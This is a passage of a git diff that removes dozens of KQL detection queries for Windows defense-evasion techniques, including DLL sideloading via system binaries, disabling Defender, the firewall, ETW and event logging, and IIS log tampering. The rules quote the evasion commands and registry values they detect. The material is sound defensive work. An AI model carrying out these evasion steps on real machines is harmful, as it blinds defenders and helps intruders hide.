\ No newline at end of file
diff --git a/Defense Evasion/DLL_Execution_Via_Register-cimprovider.exe.kql b/Defense Evasion/DLL_Execution_Via_Register-cimprovider.exe.kql
deleted file mode 100644
index 580b5c06..00000000
--- a/Defense Evasion/DLL_Execution_Via_Register-cimprovider.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ivan Dyachkov, Yulia Fomina, oscd.community
-// Date: 2020/10/07
-// Level: medium
-// Description: Detects using register-cimprovider.exe to execute arbitrary dll file.
-// Tags: attack.defense_evasion, attack.t1574
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-path" and ProcessCommandLine contains "dll") and FolderPath endswith "\\register-cimprovider.exe"
\ No newline at end of file
diff --git a/Defense Evasion/DLL_Execution_via_Rasautou.exe.kql b/Defense Evasion/DLL_Execution_via_Rasautou.exe.kql
deleted file mode 100644
index 2ffe336e..00000000
--- a/Defense Evasion/DLL_Execution_via_Rasautou.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Julia Fomina, oscd.community
-// Date: 2020/10/09
-// Level: medium
-// Description: Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -d " and ProcessCommandLine contains " -p ") and (FolderPath endswith "\\rasautou.exe" or ProcessVersionInfoOriginalFileName =~ "rasdlui.exe")
\ No newline at end of file
diff --git a/Defense Evasion/DLL_Load_By_System_Process_From_Suspicious_Locations.kql b/Defense Evasion/DLL_Load_By_System_Process_From_Suspicious_Locations.kql
deleted file mode 100644
index d3c89b0f..00000000
--- a/Defense Evasion/DLL_Load_By_System_Process_From_Suspicious_Locations.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/17
-// Level: medium
-// Description: Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"
-// Tags: attack.defense_evasion, attack.t1070
-DeviceImageLoadEvents
-| where (FolderPath startswith "C:\\Users\\Public\\" or FolderPath startswith "C:\\PerfLogs\\") and InitiatingProcessFolderPath startswith "C:\\Windows\\"
\ No newline at end of file
diff --git a/Defense Evasion/DLL_Loaded_From_Suspicious_Location_Via_Cmspt.EXE.kql b/Defense Evasion/DLL_Loaded_From_Suspicious_Location_Via_Cmspt.EXE.kql
deleted file mode 100644
index 021c10fe..00000000
--- a/Defense Evasion/DLL_Loaded_From_Suspicious_Location_Via_Cmspt.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/30
-// Level: high
-// Description: Detects cmstp loading "dll" or "ocx" files from suspicious locations
-// Tags: attack.defense_evasion, attack.t1218.003
-DeviceImageLoadEvents
-| where (FolderPath contains "\\PerfLogs\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Users\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\") and (FolderPath endswith ".dll" or FolderPath endswith ".ocx") and InitiatingProcessFolderPath endswith "\\cmstp.exe"
\ No newline at end of file
diff --git a/Defense Evasion/DLL_Loaded_via_CertOC.EXE.kql b/Defense Evasion/DLL_Loaded_via_CertOC.EXE.kql
deleted file mode 100644
index 7e67003a..00000000
--- a/Defense Evasion/DLL_Loaded_via_CertOC.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer @austinsonger
-// Date: 2021/10/23
-// Level: medium
-// Description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -LoadDLL " or ProcessCommandLine contains " /LoadDLL ") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe")
\ No newline at end of file
diff --git a/Defense Evasion/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql b/Defense Evasion/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql
deleted file mode 100644
index 056a9e92..00000000
--- a/Defense Evasion/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/07/30
-// Level: high
-// Description: Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)
-but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002
-DeviceFileEvents
-| where FolderPath endswith ".dll" and (FolderPath startswith "C:\\Windows \\" or FolderPath startswith "C:\\Program Files \\" or FolderPath startswith "C:\\Program Files (x86) \\")
\ No newline at end of file
diff --git a/Defense Evasion/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql b/Defense Evasion/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql
deleted file mode 100644
index 29170ff9..00000000
--- a/Defense Evasion/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/01
-// Level: high
-// Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL.
-Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
-
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ShellChromeAPI.dll"
\ No newline at end of file
diff --git a/Defense Evasion/DLL_Sideloading_by_VMware_Xfer_Utility.kql b/Defense Evasion/DLL_Sideloading_by_VMware_Xfer_Utility.kql
deleted file mode 100644
index 3e19a55a..00000000
--- a/Defense Evasion/DLL_Sideloading_by_VMware_Xfer_Utility.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/02
-// Level: high
-// Description: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL
-// Tags: attack.defense_evasion, attack.t1574.002
-DeviceProcessEvents
-| where FolderPath endswith "\\VMwareXferlogs.exe" and (not(FolderPath startswith "C:\\Program Files\\VMware\\"))
\ No newline at end of file
diff --git a/Defense Evasion/DNS-over-HTTPS_Enabled_by_Registry.kql b/Defense Evasion/DNS-over-HTTPS_Enabled_by_Registry.kql
deleted file mode 100644
index 35b252a0..00000000
--- a/Defense Evasion/DNS-over-HTTPS_Enabled_by_Registry.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Austin Songer
-// Date: 2021/07/22
-// Level: medium
-// Description: Detects when a user enables DNS-over-HTTPS.
-This can be used to hide internet activity or be used to hide the process of exfiltrating data.
-With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.
-
-// Tags: attack.defense_evasion, attack.t1140, attack.t1112
-DeviceRegistryEvents
-| where (RegistryValueData =~ "secure" and RegistryKey endswith "\\SOFTWARE\\Google\\Chrome\\DnsOverHttpsMode") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Edge\\BuiltInDnsClientEnabled") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Mozilla\\Firefox\\DNSOverHTTPS\\Enabled")
\ No newline at end of file
diff --git a/Defense Evasion/Detect_Virtualbox_Driver_Installation_OR_Starting_Of_VMs.kql b/Defense Evasion/Detect_Virtualbox_Driver_Installation_OR_Starting_Of_VMs.kql
deleted file mode 100644
index 08a09450..00000000
--- a/Defense Evasion/Detect_Virtualbox_Driver_Installation_OR_Starting_Of_VMs.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe
-// Date: 2020/09/26
-// Level: low
-// Description: Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.
-// Tags: attack.defense_evasion, attack.t1564.006, attack.t1564
-DeviceProcessEvents
-| where (ProcessCommandLine contains "VBoxRT.dll,RTR3Init" or ProcessCommandLine contains "VBoxC.dll" or ProcessCommandLine contains "VBoxDrv.sys") or (ProcessCommandLine contains "startvm" or ProcessCommandLine contains "controlvm")
\ No newline at end of file
diff --git a/Defense Evasion/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql b/Defense Evasion/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql
deleted file mode 100644
index 42c5fde8..00000000
--- a/Defense Evasion/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Agro (@agro_sev) oscd.community
-// Date: 2020/10/10
-// Level: medium
-// Description: This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.
-Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
-
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\sqlps.exe" or ((FolderPath endswith "\\sqlps.exe" or ProcessVersionInfoOriginalFileName =~ "sqlps.exe") and (not(InitiatingProcessFolderPath endswith "\\sqlagent.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/DeviceCredentialDeployment_Execution.kql b/Defense Evasion/DeviceCredentialDeployment_Execution.kql
deleted file mode 100644
index 9562d08b..00000000
--- a/Defense Evasion/DeviceCredentialDeployment_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects the execution of DeviceCredentialDeployment to hide a process from view
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where FolderPath endswith "\\DeviceCredentialDeployment.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Devtoolslauncher.exe_Executes_Specified_Binary.kql b/Defense Evasion/Devtoolslauncher.exe_Executes_Specified_Binary.kql
deleted file mode 100644
index 00125077..00000000
--- a/Defense Evasion/Devtoolslauncher.exe_Executes_Specified_Binary.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community (rule), @_felamos (idea)
-// Date: 2019/10/12
-// Level: high
-// Description: The Devtoolslauncher.exe executes other binary
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "LaunchForDeploy" and FolderPath endswith "\\devtoolslauncher.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Diagnostic_Library_Sdiageng.DLL_Loaded_By_Msdt.EXE.kql b/Defense Evasion/Diagnostic_Library_Sdiageng.DLL_Loaded_By_Msdt.EXE.kql
deleted file mode 100644
index cbf97ca4..00000000
--- a/Defense Evasion/Diagnostic_Library_Sdiageng.DLL_Loaded_By_Msdt.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Greg (rule)
-// Date: 2022/06/17
-// Level: high
-// Description: Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library
-// Tags: attack.defense_evasion, attack.t1202, cve.2022.30190
-DeviceImageLoadEvents
-| where FolderPath endswith "\\sdiageng.dll" and InitiatingProcessFolderPath endswith "\\msdt.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Directory_Removal_Via_Rmdir.kql b/Defense Evasion/Directory_Removal_Via_Rmdir.kql
deleted file mode 100644
index 84822f3c..00000000
--- a/Defense Evasion/Directory_Removal_Via_Rmdir.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: frack113
-// Date: 2022/01/15
-// Level: low
-// Description: Detects execution of the builtin "rmdir" command in order to delete directories.
-Adversaries may delete files left behind by the actions of their intrusion activity.
-Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.
-Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
-
-// Tags: attack.defense_evasion, attack.t1070.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "/q") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and ProcessCommandLine contains "rmdir"
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Administrative_Share_Creation_at_Startup.kql b/Defense Evasion/Disable_Administrative_Share_Creation_at_Startup.kql
deleted file mode 100644
index 2dafc2c6..00000000
--- a/Defense Evasion/Disable_Administrative_Share_Creation_at_Startup.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/16
-// Level: medium
-// Description: Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system
-// Tags: attack.defense_evasion, attack.t1070.005
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Services\\LanmanServer\\Parameters" and (RegistryKey endswith "\\AutoShareWks" or RegistryKey endswith "\\AutoShareServer")
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Exploit_Guard_Network_Protection_on_Windows_Defender.kql b/Defense Evasion/Disable_Exploit_Guard_Network_Protection_on_Windows_Defender.kql
deleted file mode 100644
index 2be410f2..00000000
--- a/Defense Evasion/Disable_Exploit_Guard_Network_Protection_on_Windows_Defender.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer @austinsonger
-// Date: 2021/08/04
-// Level: medium
-// Description: Detects disabling Windows Defender Exploit Guard Network Protection
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (00000001)" and RegistryKey contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\App and Browser protection\\DisallowExploitProtectionOverride"
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Internal_Tools_or_Feature_in_Registry.kql b/Defense Evasion/Disable_Internal_Tools_or_Feature_in_Registry.kql
deleted file mode 100644
index bcf1f3ec..00000000
--- a/Defense Evasion/Disable_Internal_Tools_or_Feature_in_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems), CrimpSec
-// Date: 2022/03/18
-// Level: medium
-// Description: Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\shutdownwithoutlogon" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PushNotifications\\ToastEnabled" or RegistryKey endswith "SYSTEM\\CurrentControlSet\\Control\\Storage\\Write Protection" or RegistryKey endswith "SYSTEM\\CurrentControlSet\\Control\\StorageDevicePolicies\\WriteProtect")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\StartMenuLogOff" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableChangePassword" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableLockWorkstation" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskmgr" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispBackgroundPage" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispCPL" or RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer\\DisableNotificationCenter" or RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows\\System\\DisableCMD"))
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Macro_Runtime_Scan_Scope.kql b/Defense Evasion/Disable_Macro_Runtime_Scan_Scope.kql
deleted file mode 100644
index 98361323..00000000
--- a/Defense Evasion/Disable_Macro_Runtime_Scan_Scope.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/25
-// Level: high
-// Description: Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros
-// Tags: attack.defense_evasion
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\SOFTWARE" and RegistryKey contains "\\Microsoft\\Office" and RegistryKey contains "\\Common\\Security") and RegistryKey endswith "\\MacroRuntimeScanScope"
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Microsoft_Defender_Firewall_via_Registry.kql b/Defense Evasion/Disable_Microsoft_Defender_Firewall_via_Registry.kql
deleted file mode 100644
index ae0316e9..00000000
--- a/Defense Evasion/Disable_Microsoft_Defender_Firewall_via_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/09
-// Level: medium
-// Description: Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage
-// Tags: attack.defense_evasion, attack.t1562.004
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Services\\SharedAccess\\Parameters\\FirewallPolicy" and RegistryKey endswith "\\EnableFirewall"
\ No newline at end of file
diff --git a/Defense Evasion/Disable_PUA_Protection_on_Windows_Defender.kql b/Defense Evasion/Disable_PUA_Protection_on_Windows_Defender.kql
deleted file mode 100644
index 4c0fde0f..00000000
--- a/Defense Evasion/Disable_PUA_Protection_on_Windows_Defender.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer @austinsonger
-// Date: 2021/08/04
-// Level: high
-// Description: Detects disabling Windows Defender PUA protection
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Policies\\Microsoft\\Windows Defender\\PUAProtection"
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Privacy_Settings_Experience_in_Registry.kql b/Defense Evasion/Disable_Privacy_Settings_Experience_in_Registry.kql
deleted file mode 100644
index 15e206f6..00000000
--- a/Defense Evasion/Disable_Privacy_Settings_Experience_in_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/10/02
-// Level: medium
-// Description: Detects registry modifications that disable Privacy Settings Experience
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Windows\\OOBE\\DisablePrivacyExperience"
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Tamper_Protection_on_Windows_Defender.kql b/Defense Evasion/Disable_Tamper_Protection_on_Windows_Defender.kql
deleted file mode 100644
index d1499c8c..00000000
--- a/Defense Evasion/Disable_Tamper_Protection_on_Windows_Defender.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer @austinsonger
-// Date: 2021/08/04
-// Level: medium
-// Description: Detects disabling Windows Defender Tamper Protection
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows Defender\\Features\\TamperProtection") and (not(((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Windows Defender\\MsMpEng.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Windows_Defender_AV_Security_Monitoring.kql b/Defense Evasion/Disable_Windows_Defender_AV_Security_Monitoring.kql
deleted file mode 100644
index 179a8de2..00000000
--- a/Defense Evasion/Disable_Windows_Defender_AV_Security_Monitoring.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: ok @securonix invrep-de, oscd.community, frack113
-// Date: 2020/10/12
-// Level: high
-// Description: Detects attackers attempting to disable Windows Defender using Powershell
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "-DisableBehaviorMonitoring $true" or ProcessCommandLine contains "-DisableRuntimeMonitoring $true")) or ((FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "WinDefend") or (ProcessCommandLine contains "config" and ProcessCommandLine contains "WinDefend" and ProcessCommandLine contains "start=disabled") or (ProcessCommandLine contains "stop" and ProcessCommandLine contains "WinDefend")))
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Windows_Defender_Functionalities_Via_Registry_Keys.kql b/Defense Evasion/Disable_Windows_Defender_Functionalities_Via_Registry_Keys.kql
deleted file mode 100644
index ec388f50..00000000
--- a/Defense Evasion/Disable_Windows_Defender_Functionalities_Via_Registry_Keys.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel
-// Date: 2022/08/01
-// Level: high
-// Description: Detects when attackers or tools disable Windows Defender functionalities via the Windows registry
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows Defender" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\Windows Defender") and ((RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\App and Browser protection\\DisallowExploitProtectionOverride" or RegistryKey endswith "\\Features\\TamperProtection" or RegistryKey endswith "\\MpEngine\\MpEnablePus" or RegistryKey endswith "\\PUAProtection" or RegistryKey endswith "\\Signature Update\\ForceUpdateFromMU" or RegistryKey endswith "\\SpyNet\\SpynetReporting" or RegistryKey endswith "\\SpyNet\\SubmitSamplesConsent" or RegistryKey endswith "\\Windows Defender Exploit Guard\\Controlled Folder Access\\EnableControlledFolderAccess")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\DisableAntiSpyware" or RegistryKey endswith "\\DisableAntiVirus" or RegistryKey endswith "\\Real-Time Protection\\DisableBehaviorMonitoring" or RegistryKey endswith "\\Real-Time Protection\\DisableIntrusionPreventionSystem" or RegistryKey endswith "\\Real-Time Protection\\DisableIOAVProtection" or RegistryKey endswith "\\Real-Time Protection\\DisableOnAccessProtection" or RegistryKey endswith "\\Real-Time Protection\\DisableRealtimeMonitoring" or RegistryKey endswith "\\Real-Time Protection\\DisableScanOnRealtimeEnable" or RegistryKey endswith "\\Real-Time Protection\\DisableScriptScanning" or RegistryKey endswith "\\Reporting\\DisableEnhancedNotifications" or RegistryKey endswith "\\SpyNet\\DisableBlockAtFirstSeen")))
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Windows_Event_Logging_Via_Registry.kql b/Defense Evasion/Disable_Windows_Event_Logging_Via_Registry.kql
deleted file mode 100644
index d51c9399..00000000
--- a/Defense Evasion/Disable_Windows_Event_Logging_Via_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/04
-// Level: high
-// Description: Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceRegistryEvents
-| where (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels" and RegistryKey endswith "\\Enabled") and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\winsxs\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" and (RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-FileInfoMinifilter" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-ASN1" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Kernel-AppCompat" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Runtime\\Error" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-CAPI2/Operational")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Compat-Appraiser") or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\wevtutil.exe"))) and (not((InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath))))
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Windows_Firewall_by_Registry.kql b/Defense Evasion/Disable_Windows_Firewall_by_Registry.kql
deleted file mode 100644
index 5a8e047e..00000000
--- a/Defense Evasion/Disable_Windows_Firewall_by_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/19
-// Level: medium
-// Description: Detect set EnableFirewall to 0 to disable the Windows firewall
-// Tags: attack.defense_evasion, attack.t1562.004
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\StandardProfile\\EnableFirewall" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\DomainProfile\\EnableFirewall")
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Windows_IIS_HTTP_Logging.kql b/Defense Evasion/Disable_Windows_IIS_HTTP_Logging.kql
deleted file mode 100644
index 2e239422..00000000
--- a/Defense Evasion/Disable_Windows_IIS_HTTP_Logging.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/09
-// Level: high
-// Description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "set" and ProcessCommandLine contains "config" and ProcessCommandLine contains "section:httplogging" and ProcessCommandLine contains "dontLog:true") and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Windows_Security_Center_Notifications.kql b/Defense Evasion/Disable_Windows_Security_Center_Notifications.kql
deleted file mode 100644
index 530809c4..00000000
--- a/Defense Evasion/Disable_Windows_Security_Center_Notifications.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/19
-// Level: medium
-// Description: Detect set UseActionCenterExperience to 0 to disable the Windows security center notification
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "Windows\\CurrentVersion\\ImmersiveShell\\UseActionCenterExperience"
\ No newline at end of file
diff --git a/Defense Evasion/Disable_of_ETW_Trace.kql b/Defense Evasion/Disable_of_ETW_Trace.kql
deleted file mode 100644
index 9ce3bb23..00000000
--- a/Defense Evasion/Disable_of_ETW_Trace.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
-// Date: 2019/03/22
-// Level: high
-// Description: Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.
-// Tags: attack.defense_evasion, attack.t1070, attack.t1562.006, car.2016-04-002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "cl" and ProcessCommandLine contains "/Trace") or (ProcessCommandLine contains "clear-log" and ProcessCommandLine contains "/Trace") or (ProcessCommandLine contains "sl" and ProcessCommandLine contains "/e:false") or (ProcessCommandLine contains "set-log" and ProcessCommandLine contains "/e:false") or (ProcessCommandLine contains "logman" and ProcessCommandLine contains "update" and ProcessCommandLine contains "trace" and ProcessCommandLine contains "--p" and ProcessCommandLine contains "-ets") or ProcessCommandLine contains "Remove-EtwTraceProvider" or (ProcessCommandLine contains "Set-EtwTraceProvider" and ProcessCommandLine contains "0x11")
\ No newline at end of file
diff --git a/Defense Evasion/Disabled_IE_Security_Features.kql b/Defense Evasion/Disabled_IE_Security_Features.kql
deleted file mode 100644
index a947916f..00000000
--- a/Defense Evasion/Disabled_IE_Security_Features.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020/06/19
-// Level: high
-// Description: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
